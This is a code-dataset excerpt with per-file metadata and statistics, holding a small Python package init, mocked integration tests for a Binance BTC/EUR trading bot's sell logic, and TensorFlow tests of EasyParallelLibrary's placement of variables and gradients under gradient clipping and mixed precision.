| 25.714286 | 36 | 0.8 | 25 | 180 | 5.48 | 0.4 | 0.364964 | 0.372263 | 0.459854 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.133333 | 180 | 6 | 37 | 30 | 0.878205 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
aed2227b710980826d19e15a46f486d3b6110eaa | 47 | py | Python | models/__init__.py | williamsashbee/partialconv-gsu | 5ad3b0d0b5a534035a7601e8c66a328457407b13 | [
"BSD-3-Clause"
] | 1,106 | 2018-11-26T20:38:11.000Z | 2022-03-31T19:16:27.000Z | models/__init__.py | Zxl19990529/partialconv | 93cebd9bea58acecf8389ae29d2e53a387b8d69a | [
"BSD-3-Clause"
] | 36 | 2018-11-29T05:41:08.000Z | 2022-03-27T01:53:33.000Z | models/__init__.py | Zxl19990529/partialconv | 93cebd9bea58acecf8389ae29d2e53a387b8d69a | [
"BSD-3-Clause"
] | 231 | 2018-11-29T04:13:13.000Z | 2022-03-31T11:17:32.000Z | from .pd_resnet import *
from .pd_vgg import * | 23.5 | 25 | 0.744681 | 8 | 47 | 4.125 | 0.625 | 0.363636 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.170213 | 47 | 2 | 26 | 23.5 | 0.846154 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
aef3a57474cf9d6750c721ac99e3bd340bbe56ef | 5,253 | py | Python | tests/integration/binance/buy/test_sell.py | microweb10/corecito | ac861ac5623c62aa84498c923159e1659149a7ba | [
"Apache-2.0"
] | 6 | 2020-12-23T01:47:46.000Z | 2021-01-21T10:34:08.000Z | tests/integration/binance/buy/test_sell.py | sebaslogen/corecito | d2c47fe8397938df6c8c38c0a1cad11dc3c760a7 | [
"Apache-2.0"
] | 20 | 2020-12-26T14:58:45.000Z | 2021-01-21T19:45:26.000Z | tests/integration/binance/buy/test_sell.py | microweb10/corecito | ac861ac5623c62aa84498c923159e1659149a7ba | [
"Apache-2.0"
] | 2 | 2021-01-08T20:45:23.000Z | 2021-01-17T03:11:07.000Z | from imports import *
from mocked import Mocked
class TestSell:
def setup_logger_variable_handler(self):
logger = logging.getLogger('CN')
log_capture_string = StringIO()
log_handler = logging.StreamHandler(log_capture_string)
logger.addHandler(log_handler)
return log_capture_string
def test_core_deviated_sell_excess(self, monkeypatch):
monkeypatch.setattr(corecito, "get_config", Mocked.config_for_test_core_deviated_sell_excess)
monkeypatch.setattr(CorecitoAccount, "get_tickers", Mocked.get_tickers_for_test_core_deviated_sell_excess)
monkeypatch.setattr(CorecitoAccount, "get_balances", Mocked.get_balances_for_test_core_deviated_sell_excess)
log_capture_string = self.setup_logger_variable_handler()
asyncio.run(corecito.main())
log_output = log_capture_string.getvalue()
log_capture_string.close()
assert "Working on Binance Exchange" in log_output
assert "Market BTCEUR" in log_output
assert "buy price: 11000.0" in log_output
assert "sell price: 11000.0" in log_output
assert "(Base) BTC balance:0.1" in log_output
assert "(Core) EUR balance:0" in log_output
assert "Core number adjustments" in log_output
assert "Core number: 1000 EUR" in log_output
assert "Deviated Core number:1100.000000 EUR" in log_output
assert "Increased 10.00% - excess of 100.000000 EUR denominated in BTC" in log_output
assert "Selling: 0.009091 BTC at 11000.0 to park an excess of 100.000000 EUR" in log_output
assert "Price is rock-solid stable" not in log_output
def test_price_rock_solid_do_not_sell(self, monkeypatch):
monkeypatch.setattr(corecito, "get_config", Mocked.config_for_test_price_rock_solid_do_not_sell)
monkeypatch.setattr(CorecitoAccount, "get_tickers", Mocked.get_tickers_for_test_price_rock_solid_do_not_sell)
monkeypatch.setattr(CorecitoAccount, "get_balances", Mocked.get_balances_for_test_price_rock_solid_do_not_sell)
log_capture_string = self.setup_logger_variable_handler()
asyncio.run(corecito.main())
log_output = log_capture_string.getvalue()
log_capture_string.close()
assert "Working on Binance Exchange" in log_output
assert "Market BTCEUR" in log_output
assert "buy price: 10500.0" in log_output
assert "sell price: 10500.0" in log_output
assert "(Base) BTC balance:0.1" in log_output
assert "(Core) EUR balance:0" in log_output
assert "Core number adjustments" in log_output
assert "Core number: 1000 EUR" in log_output
assert "Deviated Core number:1050.000000 EUR" in log_output
assert "Price is rock-solid stable (5.00%)" in log_output
assert "Increased 5.00% - excess of 50.000000 EUR denominated in BTC" not in log_output
assert "Selling:" not in log_output
def test_exceeded_max_price_do_not_sell(self, monkeypatch):
monkeypatch.setattr(corecito, "get_config", Mocked.config_for_test_exceeded_max_price_do_not_sell)
monkeypatch.setattr(CorecitoAccount, "get_tickers", Mocked.get_tickers_for_test_exceeded_max_price_do_not_sell)
monkeypatch.setattr(CorecitoAccount, "get_balances", Mocked.get_balances_for_test_exceeded_max_price_do_not_sell)
log_capture_string = self.setup_logger_variable_handler()
asyncio.run(corecito.main())
log_output = log_capture_string.getvalue()
log_capture_string.close()
assert "Working on Binance Exchange" in log_output
assert "Market BTCEUR" in log_output
assert "buy price: 11501.0" in log_output
assert "sell price: 11501.0" in log_output
assert "(Base) BTC balance:0.1" in log_output
assert "(Core) EUR balance:0" in log_output
assert "Core number adjustments" in log_output
assert "Core number: 1000 EUR" in log_output
assert "Deviated Core number:1150.100000 EUR" in log_output
assert "BTCEUR price exploded to 11501.000000, exceeding the max price to stop corecito 11500.000000" in log_output
assert "Selling:" not in log_output
def test_exceeded_max_core_number_increase_percentage_do_not_sell(self, monkeypatch):
monkeypatch.setattr(corecito, "get_config", Mocked.config_for_test_exceeded_max_core_number_increase_percentage_do_not_sell)
monkeypatch.setattr(CorecitoAccount, "get_tickers", Mocked.get_tickers_for_test_exceeded_max_core_number_increase_percentage_do_not_sell)
monkeypatch.setattr(CorecitoAccount, "get_balances", Mocked.get_balances_for_test_exceeded_max_core_number_increase_percentage_do_not_sell)
log_capture_string = self.setup_logger_variable_handler()
asyncio.run(corecito.main())
log_output = log_capture_string.getvalue()
log_capture_string.close()
assert "Working on Binance Exchange" in log_output
assert "Market BTCEUR" in log_output
assert "buy price: 12001.0" in log_output
assert "sell price: 12001.0" in log_output
assert "(Base) BTC balance:0.1" in log_output
assert "(Core) EUR balance:0" in log_output
assert "Core number adjustments" in log_output
assert "Core number: 1000 EUR" in log_output
assert "Deviated Core number:1200.100000 EUR" in log_output
assert "Exploded 20.01%" in log_output
assert "Consider updating CoreNumber to 1200.100000" in log_output
assert "Selling:" not in log_output
| 44.897436 | 143 | 0.778032 | 771 | 5,253 | 4.98703 | 0.136187 | 0.119376 | 0.13446 | 0.190117 | 0.885826 | 0.844994 | 0.814564 | 0.770091 | 0.76515 | 0.755267 | 0 | 0.045017 | 0.15001 | 5,253 | 116 | 144 | 45.284483 | 0.816125 | 0 | 0 | 0.488636 | 0 | 0 | 0.257757 | 0 | 0 | 0 | 0 | 0 | 0.534091 | 1 | 0.056818 | false | 0 | 0.022727 | 0 | 0.102273 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
9de99d5192cb06fe6e26baa499373c023bd86daa | 22,882 | py | Python | tests/add_weights_test.py | SeaOfOcean/EasyParallelLibrary | 93baaa851f5ce078b1c55032a27398a588ca4107 | [
"Apache-2.0"
] | 100 | 2022-02-23T08:54:35.000Z | 2022-03-31T04:02:38.000Z | tests/add_weights_test.py | chenyang472043503/EasyParallelLibrary | cd2873fe04c86c62e55418129ba2f1dc83d222b4 | [
"Apache-2.0"
] | null | null | null | tests/add_weights_test.py | chenyang472043503/EasyParallelLibrary | cd2873fe04c86c62e55418129ba2f1dc83d222b4 | [
"Apache-2.0"
] | 22 | 2022-02-23T09:02:01.000Z | 2022-03-18T03:24:00.000Z | # Copyright 2021 Alibaba Group Holding Limited. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# =============================================================================
"""Test for add_weight."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from distutils.version import LooseVersion as Version
import six
import numpy as np
import tensorflow as tf
from tensorflow.python.layers import base
from tensorflow.python.platform import test
from tensorflow.python.framework.versions import __version__
import epl
from epl.config import Config
from epl.ir.graph import Graph
new_tf_version = \
Version(__version__) < Version("2.0") and \
Version(__version__) >= Version("1.14.0")
# pylint: disable=missing-docstring,protected-access,unused-argument,arguments-differ
# pylint: disable=line-too-long,bad-continuation,unused-variable
class FFN(base.Layer):
"""Construct a FeedForward Networks.
Args:
inputs: BLM Tensor.
Returns:
outputs: BLM Tensor.
aux_loss: scalar auxiliary loss.
"""
def __init__(self, **kwargs):
super(FFN, self).__init__(**kwargs)
self.initializer = None
self.num_experts = 10
self.intermediate_size = 16
self.hidden_size = 16
self.activation_fn = tf.keras.activations.get("relu")
def build(self, input_shape):
with epl.split():
self.in_weights = self.add_weight(shape=(self.num_experts,
self.hidden_size,
self.intermediate_size),
initializer=self.initializer,
dtype=tf.float32,
name='in_weights')
self.out_weights = self.add_weight(shape=(self.num_experts,
self.intermediate_size,
self.hidden_size),
initializer=self.initializer,
dtype=tf.float32,
name='out_weights')
super(FFN, self).build(input_shape)
def call(self, inputs, training=True):
with epl.split():
assert training
intermediate = tf.einsum('EGCM,EMH->EGCH',
inputs,
self.in_weights,
name="inter_outputs")
# activation function
activated_inters = self.activation_fn(intermediate)
# output forward
outputs = tf.einsum('EGCH,EHM->EGCM',
activated_inters,
self.out_weights,
name="outputs")
outputs = tf.reshape(outputs, [-1, 640])
return outputs
class AddWeightTest(test.TestCase):
"""Test import functions of parallelism transformation"""
def _model_def(self):
num_x = np.random.randint(0, 10, (500, 2, 20, 16)).astype(dtype=np.float32)
num_y = np.random.randint(0, 10, 500).astype(dtype=np.int32)
dataset = tf.data.Dataset.from_tensor_slices((num_x, num_y)) \
.batch(10).repeat(1)
iterator = dataset.make_initializable_iterator()
tf.add_to_collection(tf.GraphKeys.TABLE_INITIALIZERS, iterator.initializer)
x, _ = iterator.get_next()
self.ffn = FFN()
dense1 = self.ffn(inputs=x)
logits = tf.layers.dense(inputs=dense1, units=10, activation=None)
return tf.reduce_mean(logits)
def test_graph_with_local_clip(self):
conf = epl.Config()
conf.cluster.colocate_split_and_replicate = True
epl.init(conf)
epl.set_default_strategy(epl.replicate(1))
g = Graph.get()
loss = self._model_def()
optimizer = tf.train.AdamOptimizer(learning_rate=0.01)
tvars = tf.trainable_variables()
grads = tf.gradients(loss, tvars)
grads = [tf.clip_by_norm(grad, clip_norm=1.0) for grad in grads]
optimizer.apply_gradients(list(zip(grads, tvars)))
tf.train.MonitoredTrainingSession(config=tf.ConfigProto(
log_device_placement=False))
# check taskgraph.
self.assertTrue(len(g.taskgraphs) == 3)
self.assertTrue(g.taskgraphs[0].local_num_replicas == 1)
self.assertTrue(g.taskgraphs[1].local_num_replicas == 1)
self.assertTrue(g.taskgraphs[2].local_num_replicas == 1)
vars_list = [[], [], []]
vars_list[0] = [
"dense/bias/Adam:0", "dense/bias/Adam_1:0", "dense/bias:0",
"dense/kernel/Adam:0", "dense/kernel/Adam_1:0", "dense/kernel:0"
]
# TODO(jiangle.jl): Merge Taskgraph 1 and Taskgraph 2
vars_list[1] = [
"beta1_power:0", "beta2_power:0", "ffn/in_weights/Adam:0",
"ffn/in_weights/Adam_1:0", "ffn/in_weights:0",
"ffn/out_weights/Adam:0", "ffn/out_weights/Adam_1:0",
"ffn/out_weights:0"
]
vars_list[2] = []
grads = [[], [], []]
grads[0] = [
"clip_by_norm_2:0",
"clip_by_norm_3:0"
]
grads[1] = []
grads[2] = [
"clip_by_norm:0",
"clip_by_norm_1:0"
]
for i in range(3):
taskgraph = g.taskgraphs[i]
var = [ele.name for ele in taskgraph.get_variables(0)]
grd = [ele.name for ele in taskgraph.gradients]
list.sort(var)
list.sort(grd)
self.assertEqual(var, vars_list[i])
self.assertEqual(grd, grads[i])
def test_graph_with_global_clip(self):
conf = epl.Config()
conf.cluster.colocate_split_and_replicate = True
epl.init(conf)
epl.set_default_strategy(epl.replicate(1))
g = Graph.get()
loss = self._model_def()
optimizer = tf.train.AdamOptimizer(learning_rate=0.01)
tvars = tf.trainable_variables()
grads = tf.gradients(loss, tvars)
(grads, _) = tf.clip_by_global_norm(grads, clip_norm=1.0)
optimizer.apply_gradients(list(zip(grads, tvars)))
tf.train.MonitoredTrainingSession(config=tf.ConfigProto(
log_device_placement=False))
# check taskgraph.
self.assertTrue(len(g.taskgraphs) == 3)
self.assertTrue(g.taskgraphs[0].local_num_replicas == 1)
self.assertTrue(g.taskgraphs[1].local_num_replicas == 1)
self.assertTrue(g.taskgraphs[2].local_num_replicas == 1)
vars_list = [[], [], []]
vars_list[0] = [
"dense/bias/Adam:0", "dense/bias/Adam_1:0", "dense/bias:0",
"dense/kernel/Adam:0", "dense/kernel/Adam_1:0", "dense/kernel:0"
]
# TODO(jiangle.jl): Merge Taskgraph 1 and Taskgraph 2
vars_list[1] = [
"beta1_power:0", "beta2_power:0", "ffn/in_weights/Adam:0",
"ffn/in_weights/Adam_1:0", "ffn/in_weights:0",
"ffn/out_weights/Adam:0", "ffn/out_weights/Adam_1:0",
"ffn/out_weights:0"
]
vars_list[2] = []
grads = [[], [], []]
grads[0] = [
"clip_by_global_norm/clip_by_global_norm/_2:0",
"clip_by_global_norm/clip_by_global_norm/_3:0"
]
grads[1] = []
grads[2] = [
"clip_by_global_norm/clip_by_global_norm/_0:0",
"clip_by_global_norm/clip_by_global_norm/_1:0"
]
for i in range(3):
taskgraph = g.taskgraphs[i]
var = [ele.name for ele in taskgraph.get_variables(0)]
grd = [ele.name for ele in taskgraph.gradients]
list.sort(var)
list.sort(grd)
self.assertEqual(var, vars_list[i])
self.assertEqual(grd, grads[i])
def test_graph_with_local_clip_and_amp(self):
config = epl.Config()
config.amp.level = "O1"
config.amp.loss_scale = 128
config.cluster.colocate_split_and_replicate = True
epl.init(config)
epl.set_default_strategy(epl.replicate(1))
g = Graph.get()
loss = self._model_def()
optimizer = tf.train.AdamOptimizer(learning_rate=0.01)
tvars = tf.trainable_variables()
grads = tf.gradients(loss, tvars)
grads = [tf.clip_by_norm(grad, clip_norm=1.0) for grad in grads]
optimizer.apply_gradients(list(zip(grads, tvars)))
tf.train.MonitoredTrainingSession(config=tf.ConfigProto(
log_device_placement=False))
# check taskgraph.
self.assertTrue(len(g.taskgraphs) == 3)
self.assertTrue(g.taskgraphs[0].local_num_replicas == 1)
self.assertTrue(g.taskgraphs[1].local_num_replicas == 1)
self.assertTrue(g.taskgraphs[2].local_num_replicas == 1)
vars_list = [[], [], []]
vars_list[0] = [
"dense/bias/Adam:0", "dense/bias/Adam_1:0", "dense/bias:0",
"dense/kernel/Adam:0", "dense/kernel/Adam_1:0", "dense/kernel:0"
]
# TODO(jiangle.jl): Merge Taskgraph 1 and Taskgraph 2
vars_list[1] = [
"beta1_power:0", "beta2_power:0", "ffn/in_weights/Adam:0",
"ffn/in_weights/Adam_1:0", "ffn/in_weights:0",
"ffn/out_weights/Adam:0", "ffn/out_weights/Adam_1:0",
"ffn/out_weights:0"
]
vars_list[2] = []
grads = [[], [], []]
grads[0] = [
"clip_by_norm_2:0",
"clip_by_norm_3:0"
]
grads[1] = []
grads[2] = [
"clip_by_norm:0",
"clip_by_norm_1:0"
]
for i in range(3):
taskgraph = g.taskgraphs[i]
var = [ele.name for ele in taskgraph.get_variables(0)]
grd = [ele.name for ele in taskgraph.gradients]
list.sort(var)
list.sort(grd)
self.assertEqual(var, vars_list[i])
self.assertEqual(grd, grads[i])
def test_graph_with_global_clip_and_amp(self):
config = epl.Config()
config.amp.level = "O1"
config.amp.loss_scale = 128
config.cluster.colocate_split_and_replicate = True
epl.init(config)
epl.set_default_strategy(epl.replicate(1))
g = Graph.get()
loss = self._model_def()
optimizer = tf.train.AdamOptimizer(learning_rate=0.01)
tvars = tf.trainable_variables()
grads = tf.gradients(loss, tvars)
(grads, _) = tf.clip_by_global_norm(grads, clip_norm=1.0)
optimizer.apply_gradients(list(zip(grads, tvars)))
tf.train.MonitoredTrainingSession(config=tf.ConfigProto(
log_device_placement=False))
# check taskgraph.
self.assertTrue(len(g.taskgraphs) == 3)
self.assertTrue(g.taskgraphs[0].local_num_replicas == 1)
self.assertTrue(g.taskgraphs[1].local_num_replicas == 1)
self.assertTrue(g.taskgraphs[2].local_num_replicas == 1)
vars_list = [[], [], []]
vars_list[0] = [
"dense/bias/Adam:0", "dense/bias/Adam_1:0", "dense/bias:0",
"dense/kernel/Adam:0", "dense/kernel/Adam_1:0", "dense/kernel:0"
]
# TODO(jiangle.jl): Merge Taskgraph 1 and Taskgraph 2
vars_list[1] = [
"beta1_power:0", "beta2_power:0", "ffn/in_weights/Adam:0",
"ffn/in_weights/Adam_1:0", "ffn/in_weights:0",
"ffn/out_weights/Adam:0", "ffn/out_weights/Adam_1:0",
"ffn/out_weights:0"
]
vars_list[2] = []
grads = [[], [], []]
grads[0] = [
"clip_by_global_norm/clip_by_global_norm/_2:0",
"clip_by_global_norm/clip_by_global_norm/_3:0"
]
grads[1] = []
grads[2] = [
"clip_by_global_norm/clip_by_global_norm/_0:0",
"clip_by_global_norm/clip_by_global_norm/_1:0"
]
for i in range(3):
taskgraph = g.taskgraphs[i]
var = [ele.name for ele in taskgraph.get_variables(0)]
grd = [ele.name for ele in taskgraph.gradients]
list.sort(var)
list.sort(grd)
self.assertEqual(var, vars_list[i])
self.assertEqual(grd, grads[i])
def test_graph_with_local_clip_and_scale(self):
conf = epl.Config()
conf.cluster.colocate_split_and_replicate = True
epl.init(conf)
epl.set_default_strategy(epl.replicate(1))
g = Graph.get()
loss = self._model_def()
optimizer = tf.train.AdamOptimizer(learning_rate=0.01)
tvars = tf.trainable_variables()
grads = tf.gradients(loss, tvars)
grads = [tf.clip_by_norm(grad, clip_norm=1.0) for grad in grads]
# Scale gradients manually
grads = [grad * float(1 / 2) for grad in grads]
optimizer.apply_gradients(list(zip(grads, tvars)))
tf.train.MonitoredTrainingSession(config=tf.ConfigProto(
log_device_placement=False))
# check taskgraph.
self.assertTrue(len(g.taskgraphs) == 3)
self.assertTrue(g.taskgraphs[0].local_num_replicas == 1)
self.assertTrue(g.taskgraphs[1].local_num_replicas == 1)
self.assertTrue(g.taskgraphs[2].local_num_replicas == 1)
vars_list = [[], [], []]
vars_list[0] = [
"dense/bias/Adam:0", "dense/bias/Adam_1:0", "dense/bias:0",
"dense/kernel/Adam:0", "dense/kernel/Adam_1:0", "dense/kernel:0"
]
# TODO(jiangle.jl): Merge Taskgraph 1 and Taskgraph 2
vars_list[1] = [
"beta1_power:0", "beta2_power:0", "ffn/in_weights/Adam:0",
"ffn/in_weights/Adam_1:0", "ffn/in_weights:0",
"ffn/out_weights/Adam:0", "ffn/out_weights/Adam_1:0",
"ffn/out_weights:0"
]
vars_list[2] = []
grads = [[], [], []]
grads[0] = ["mul_2:0", "mul_3:0"]
grads[1] = []
grads[2] = ["mul:0", "mul_1:0"]
for i in range(3):
taskgraph = g.taskgraphs[i]
var = [ele.name for ele in taskgraph.get_variables(0)]
grd = [ele.name for ele in taskgraph.gradients]
list.sort(var)
list.sort(grd)
self.assertEqual(var, vars_list[i])
self.assertEqual(grd, grads[i])
def test_graph_with_local_clip_and_scale_and_amp(self):
config = epl.Config()
config.amp.level = "O1"
config.amp.loss_scale = 128
config.cluster.colocate_split_and_replicate = True
epl.init(config)
epl.set_default_strategy(epl.replicate(1))
g = Graph.get()
loss = self._model_def()
optimizer = tf.train.AdamOptimizer(learning_rate=0.01)
tvars = tf.trainable_variables()
grads = tf.gradients(loss, tvars)
grads = [tf.clip_by_norm(grad, clip_norm=1.0) for grad in grads]
# Scale gradients manually
grads = [grad * float(1 / 2) for grad in grads]
optimizer.apply_gradients(list(zip(grads, tvars)))
tf.train.MonitoredTrainingSession(config=tf.ConfigProto(
log_device_placement=False))
# check taskgraph.
self.assertTrue(len(g.taskgraphs) == 3)
self.assertTrue(g.taskgraphs[0].local_num_replicas == 1)
self.assertTrue(g.taskgraphs[1].local_num_replicas == 1)
self.assertTrue(g.taskgraphs[2].local_num_replicas == 1)
vars_list = [[], [], []]
vars_list[0] = [
"dense/bias/Adam:0", "dense/bias/Adam_1:0", "dense/bias:0",
"dense/kernel/Adam:0", "dense/kernel/Adam_1:0", "dense/kernel:0"
]
# TODO(jiangle.jl): Merge Taskgraph 1 and Taskgraph 2
vars_list[1] = [
"beta1_power:0", "beta2_power:0", "ffn/in_weights/Adam:0",
"ffn/in_weights/Adam_1:0", "ffn/in_weights:0",
"ffn/out_weights/Adam:0", "ffn/out_weights/Adam_1:0",
"ffn/out_weights:0"
]
vars_list[2] = []
grads = [[], [], []]
grads[0] = ["mul_3:0", "mul_4:0"] if new_tf_version else ["mul_2:0", "mul_3:0"]
grads[1] = []
grads[2] = ["mul_1:0", "mul_2:0"] if new_tf_version else ["mul:0", "mul_1:0"]
self.assertEqual(len(g.taskgraphs[0].gradients), 2)
self.assertEqual(len(g.taskgraphs[2].gradients), 2)
all_gradients = g.taskgraphs[0].gradients + g.taskgraphs[2].gradients
self.assertEqual(sorted(all_gradients, key=lambda x: x.name), g.gradients)
for i in range(3):
taskgraph = g.taskgraphs[i]
var = [ele.name for ele in taskgraph.get_variables(0)]
grd = [ele.name for ele in taskgraph.gradients]
list.sort(var)
list.sort(grd)
self.assertEqual(var, vars_list[i])
def test_graph_with_global_clip_and_scale(self):
config = epl.Config()
config.cluster.colocate_split_and_replicate = True
epl.init(config)
epl.set_default_strategy(epl.replicate(1))
g = Graph.get()
loss = self._model_def()
optimizer = tf.train.AdamOptimizer(learning_rate=0.01)
tvars = tf.trainable_variables()
grads = tf.gradients(loss, tvars)
(grads, _) = tf.clip_by_global_norm(grads, clip_norm=1.0)
# Scale gradients manually
grads = [grad * float(1 / 2) for grad in grads]
optimizer.apply_gradients(list(zip(grads, tvars)))
tf.train.MonitoredTrainingSession(config=tf.ConfigProto(
log_device_placement=False))
# check taskgraph.
self.assertTrue(len(g.taskgraphs) == 3)
self.assertTrue(g.taskgraphs[0].local_num_replicas == 1)
self.assertTrue(g.taskgraphs[1].local_num_replicas == 1)
self.assertTrue(g.taskgraphs[2].local_num_replicas == 1)
vars_list = [[], [], []]
vars_list[0] = [
"dense/bias/Adam:0", "dense/bias/Adam_1:0", "dense/bias:0",
"dense/kernel/Adam:0", "dense/kernel/Adam_1:0", "dense/kernel:0"
]
# TODO(jiangle.jl): Merge Taskgraph 1 and Taskgraph 2
vars_list[1] = [
"beta1_power:0", "beta2_power:0", "ffn/in_weights/Adam:0",
"ffn/in_weights/Adam_1:0", "ffn/in_weights:0",
"ffn/out_weights/Adam:0", "ffn/out_weights/Adam_1:0",
"ffn/out_weights:0"
]
vars_list[2] = []
grads = [[], [], []]
grads[0] = ["mul_2:0", "mul_3:0"]
grads[1] = []
grads[2] = ["mul:0", "mul_1:0"]
for i in range(3):
taskgraph = g.taskgraphs[i]
var = [ele.name for ele in taskgraph.get_variables(0)]
grd = [ele.name for ele in taskgraph.gradients]
list.sort(var)
list.sort(grd)
self.assertEqual(var, vars_list[i])
self.assertEqual(grd, grads[i])
def test_graph_with_local_clip_after_allreduce(self):
conf = Config()
# Clip gradients after allreduce
conf.communication.clip_after_allreduce = True
conf.cluster.colocate_split_and_replicate = True
epl.init(conf)
epl.set_default_strategy(epl.replicate(1))
g = Graph.get()
loss = self._model_def()
optimizer = tf.train.AdamOptimizer(learning_rate=0.01)
tvars = tf.trainable_variables()
grads = tf.gradients(loss, tvars)
grads = [tf.clip_by_norm(grad, clip_norm=1.0) for grad in grads]
optimizer.apply_gradients(list(zip(grads, tvars)))
tf.train.MonitoredTrainingSession(config=tf.ConfigProto(
log_device_placement=False))
# check taskgraph.
self.assertTrue(len(g.taskgraphs) == 3)
self.assertTrue(g.taskgraphs[0].local_num_replicas == 1)
self.assertTrue(g.taskgraphs[1].local_num_replicas == 1)
self.assertTrue(g.taskgraphs[2].local_num_replicas == 1)
vars_list = [[], [], []]
vars_list[0] = [
"dense/bias/Adam:0", "dense/bias/Adam_1:0", "dense/bias:0",
"dense/kernel/Adam:0", "dense/kernel/Adam_1:0", "dense/kernel:0"
]
# TODO(jiangle.jl): Merge Taskgraph 1 and Taskgraph 2
vars_list[1] = [
"beta1_power:0", "beta2_power:0", "ffn/in_weights/Adam:0",
"ffn/in_weights/Adam_1:0", "ffn/in_weights:0",
"ffn/out_weights/Adam:0", "ffn/out_weights/Adam_1:0",
"ffn/out_weights:0"
]
vars_list[2] = []
grads = [[], [], []]
grads[0] = [
"gradients/dense/BiasAdd_grad/BiasAddGrad:0",
"gradients/dense/MatMul_grad/MatMul_1:0"
]
grads[1] = []
if new_tf_version:
grads[2] = [
"gradients/ffn/inter_outputs/MatMul_grad/Reshape_1:0",
"gradients/ffn/outputs/MatMul_grad/Reshape_1:0"
]
else:
if six.PY2:
grads[2] = [
"gradients/ffn/inter_outputs/MatMul_grad/MatMul_1:0",
"gradients/ffn/outputs/MatMul_grad/MatMul_1:0"
]
else:
grads[2] = [
"gradients/ffn/inter_outputs/transpose_1_grad/transpose:0",
"gradients/ffn/outputs/transpose_1_grad/transpose:0"
]
for i in range(3):
taskgraph = g.taskgraphs[i]
var = [ele.name for ele in taskgraph.get_variables(0)]
grd = [ele.name for ele in taskgraph.gradients]
list.sort(var)
list.sort(grd)
self.assertEqual(var, vars_list[i])
self.assertEqual(grd, grads[i])
def test_graph_with_global_clip_after_allreduce(self):
conf = Config()
# Clip gradients after allreduce
conf.communication.clip_after_allreduce = True
conf.cluster.colocate_split_and_replicate = True
epl.init(conf)
epl.set_default_strategy(epl.replicate(1))
g = Graph.get()
loss = self._model_def()
optimizer = tf.train.AdamOptimizer(learning_rate=0.01)
tvars = tf.trainable_variables()
grads = tf.gradients(loss, tvars)
(grads, _) = tf.clip_by_global_norm(grads, clip_norm=1.0)
optimizer.apply_gradients(list(zip(grads, tvars)))
tf.train.MonitoredTrainingSession(config=tf.ConfigProto(
log_device_placement=False))
# check taskgraph.
self.assertTrue(len(g.taskgraphs) == 3)
self.assertTrue(g.taskgraphs[0].local_num_replicas == 1)
self.assertTrue(g.taskgraphs[1].local_num_replicas == 1)
self.assertTrue(g.taskgraphs[2].local_num_replicas == 1)
vars_list = [[], [], []]
vars_list[0] = [
"dense/bias/Adam:0", "dense/bias/Adam_1:0", "dense/bias:0",
"dense/kernel/Adam:0", "dense/kernel/Adam_1:0", "dense/kernel:0"
]
# TODO(jiangle.jl): Merge Taskgraph 1 and Taskgraph 2
vars_list[1] = [
"beta1_power:0", "beta2_power:0", "ffn/in_weights/Adam:0",
"ffn/in_weights/Adam_1:0", "ffn/in_weights:0",
"ffn/out_weights/Adam:0", "ffn/out_weights/Adam_1:0",
"ffn/out_weights:0"
]
vars_list[2] = []
grads = [[], [], []]
grads[0] = [
"gradients/dense/BiasAdd_grad/BiasAddGrad:0",
"gradients/dense/MatMul_grad/MatMul_1:0"
]
grads[1] = []
if new_tf_version:
grads[2] = [
"gradients/ffn/inter_outputs/MatMul_grad/Reshape_1:0",
"gradients/ffn/outputs/MatMul_grad/Reshape_1:0"
]
else:
if six.PY2:
grads[2] = [
"gradients/ffn/inter_outputs/MatMul_grad/MatMul_1:0",
"gradients/ffn/outputs/MatMul_grad/MatMul_1:0"
]
else:
grads[2] = [
"gradients/ffn/inter_outputs/transpose_1_grad/transpose:0",
"gradients/ffn/outputs/transpose_1_grad/transpose:0"
]
for i in range(3):
taskgraph = g.taskgraphs[i]
var = [ele.name for ele in taskgraph.get_variables(0)]
grd = [ele.name for ele in taskgraph.gradients]
list.sort(var)
list.sort(grd)
self.assertEqual(var, vars_list[i])
self.assertEqual(grd, grads[i])
# pylint: enable=missing-docstring,protected-access,unused-argument,arguments-differ
# pylint: enable=line-too-long,bad-continuation,unused-variable
if __name__ == "__main__":
test.main()
